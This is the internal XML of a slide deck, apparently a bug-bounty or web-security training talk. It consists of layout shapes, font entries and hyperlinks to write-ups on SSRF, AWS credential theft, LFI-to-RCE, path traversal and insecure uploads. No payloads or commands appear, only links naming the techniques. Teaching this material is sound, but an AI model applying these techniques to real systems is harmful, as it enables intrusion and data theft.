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</p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lato"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId72"/>
      <p:bold r:id="rId73"/>
      <p:italic r:id="rId74"/>
      <p:boldItalic r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId7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SourceCodePro-bold.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-regular.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular.fntdata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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic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font" Target="fonts/Lato-regular.fntdata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Lato-bold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e3d587c06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e3d587c06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afb4e4112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afb4e4112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afb4e4112c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afb4e4112c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b88a89362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b88a89362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b72cdaefd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b72cdaefd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ae3d587c0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ae3d587c0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ae3d587c06_1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ae3d587c06_1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fb4e4112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fb4e4112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afb4e4112c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afb4e4112c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afb4e4112c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afb4e4112c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ae3d587c06_1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ae3d587c06_1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fb4e4112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afb4e4112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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1_8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ae3d587c06_1_8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ae3d587c06_1_8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ae3d587c06_1_8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b72cdaefd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b72cdaefd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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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b88a89362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b88a89362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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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b7ba56cea6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b7ba56cea6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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1_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ae3d587c06_1_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b72cdaefd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b72cdaefd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ae3d587c06_1_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ae3d587c06_1_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ae3d587c06_1_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ae3d587c06_1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b72cdaefd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b72cdaefd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b72cdaefd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b72cdaefd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ae3d587c06_1_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ae3d587c06_1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ae3d587c06_1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ae3d587c06_1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b7ba56cea6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b7ba56cea6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b72cdaefd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b72cdaefd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b88a89362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b88a89362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b72cdaefda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b72cdaefd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b7ba56cea6_4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b7ba56cea6_4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b7ba56cea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b7ba56cea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b7ba56cea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b7ba56cea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b72cdaef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b72cdaef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b88a89362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b88a89362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b8962b536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b8962b536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ae680e5e9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ae680e5e9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b7ba56cea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b7ba56cea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ae680e5e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ae680e5e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ae3d587c06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ae3d587c06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b72cdaefd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b72cdaefd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afb4e4112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afb4e4112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b7ba56cea6_4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b7ba56cea6_4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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699007" y="-20954"/>
            <a:ext cx="77460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909319" y="-20954"/>
            <a:ext cx="73254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457200" y="1202246"/>
            <a:ext cx="8229600" cy="12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1" i="0" sz="2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idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165205" y="5009234"/>
            <a:ext cx="16788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7" name="Google Shape;117;p2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8" name="Google Shape;118;p27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OBJECT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8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OBJECT_2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3">
  <p:cSld name="OBJECT_3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3" name="Google Shape;133;p30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0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0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4">
  <p:cSld name="OBJECT_4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9" name="Google Shape;139;p31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1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1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1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5">
  <p:cSld name="OBJECT_5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5" name="Google Shape;145;p32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2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2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2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6">
  <p:cSld name="OBJECT_6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1" name="Google Shape;151;p33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3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7">
  <p:cSld name="OBJECT_7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7" name="Google Shape;157;p34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4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8">
  <p:cSld name="OBJECT_8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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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3" name="Google Shape;163;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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rgbClr val="115F8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65" name="Google Shape;165;p3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66" name="Google Shape;166;p35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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487417" y="390906"/>
            <a:ext cx="169200" cy="87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69" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0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0" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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1" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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2" name="Google Shape;172;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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3" name="Google Shape;173;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251022" y="925449"/>
            <a:ext cx="3716100" cy="3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rgbClr val="115F8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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709160" y="1183005"/>
            <a:ext cx="39774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6" name="Google Shape;176;p3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7" name="Google Shape;177;p36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9">
  <p:cSld name="OBJECT_9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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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0" name="Google Shape;180;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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rgbClr val="115F8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3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2" name="Google Shape;182;p3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3" name="Google Shape;183;p37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OBJECT_10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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526541" y="2795835"/>
            <a:ext cx="8091000" cy="11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4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6" name="Google Shape;186;p3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7" name="Google Shape;187;p3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8" name="Google Shape;188;p38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 Slide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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="77664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1" name="Google Shape;191;p39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93" name="Google Shape;193;p3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94" name="Google Shape;194;p39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hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/rootpentesting/status/1195367343750307840" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shawarkhan.com/2018/05/getting-read-access-on-edmodo.html" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/adrien_jeanneau/status/1030934842651942912" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/HusseiN98D/status/1325464364569276417" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/398641" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/358119" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/SirLeeroyJenkin/status/1254258307478556672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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/SpenGietz/status/1030099156012953600" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/bogdantcaciuc7/status/1278069163601334273" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/from-ssrf-to-aws-credentials-disclosure-64c51e1bf5dc" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@GeneralEG/escalating-ssrf-to-rce-f28c482eb8b9" TargetMode="External"/><Relationship Id="rId12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hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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hyperlink" Target="https://twitter.com/c0mr3x/status/1115481097234726912" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/adrien_jeanneau/status/1062460475387076608" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hxzeroone/status/1161543248839622656" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://nirmaldahal.com.np/lfi-to-10-servers-pwn/" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://www.deeplook.cl/2017/05/one-cloud-based-local-file-inclusion.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://incogbyte.github.io/pathtraversal/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/leveraging-lfi-to-rce-in-a-website-with-20000-users-129050f9982b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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/pwnydaemons/status/1299147141550690304" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/thedawgyg/status/1224450254205927432" TargetMode="External"/><Relationship Id="rId7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29.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xInfection/status/1148267196306427904" TargetMode="External"/><Relationship Id="rId6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hyperlink" Target="https://twitter.com/intigriti/status/1261285068062044160" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/128685" TargetMode="External"/><Relationship Id="rId7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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/pwnydaemons/status/1296244098215694336" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/thedawgyg/status/1224547692967342080" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/253558" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/payloadartist/status/1062248690679668736" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/61312" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/386292" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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hyperlink" Target="https://medium.com/@frostnull/hi-guys-again-here-bringing-an-experience-to-share-with-you-as-usual-i-will-overshadow-some-f85a1d5a8d8c" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=D1S-G8rJrEk&amp;t=7s" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cujanovic/SSRF-Testing#abusing-enclosed-alphanumerics" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/cujanovic/status/1012695418277265408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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115748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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1248588962505113600" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://samcurry.net/reading-asp-secrets-for-17000/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=Exercise_1_simple.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/HusseiN98D/status/1165632886218928128" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/486732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hyperlink" Target="https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115857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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwaresecured.com/2018/10/19/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/381129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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/techfenix/ssrf-server-side-request-forgery-worth-4913-my-highest-bounty-ever-7d733bb368cb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId4" 